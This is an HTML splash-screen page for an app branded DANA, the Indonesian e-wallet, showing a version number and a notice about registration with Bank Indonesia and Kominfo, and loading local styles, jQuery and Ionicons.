<html>
	<head>
		<title>DANA</title>
		<meta name="viewport" content="width=device-width, initial-scale=1.0" />
		<link rel="stylesheet" href="assets/common/css/global.css">
		<link rel="stylesheet" href="assets/common/css/intro.css">
		<script src="assets/lib/jquery/jquery.js"></script>
		<script type="module" src="assets/common/js/splash.js"></script>
		<script type="module" src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.esm.js"></script>
        <script nomodule src="https://unpkg.com/ionicons@7.1.0/dist/ionicons/ionicons.js"></script>
	</head>
	<body>
		<div style="background-color: #118EEA; width: 100%; height: 100%; display: flex; flex-direction: column; align-items: center;">
			<div style="flex: 1; width: 100%; display: flex; justify-content: center; align-items: center;">
				<img src="assets/common/img/img2.jpg" style="width: calc(100% - 150px); height: 210px; object-fit: fill;">
			</div>
			<div style="color: #ffffff; font-size: 12px;">1.26.2</div>
			<div style="width: calc(100% - 40px); margin-top: 10px; margin-bottom: 20px; padding-left: 20px; padding-right: 20px; display: flex; flex-direction: row; align-items: center;">
				<img src="assets/common/img/img3.jpg" style="width: 100px; height: 40px; object-fit: fill;">
				<div style="flex: 1; color: #ffffff; font-size: 10px; margin-left: 10px;">
					DANA Indonesia terdaftar dan diawasi oleh Bank Indonesia dan Kominfo.
				</div>
			</div>
		</div>
	</body>
</html>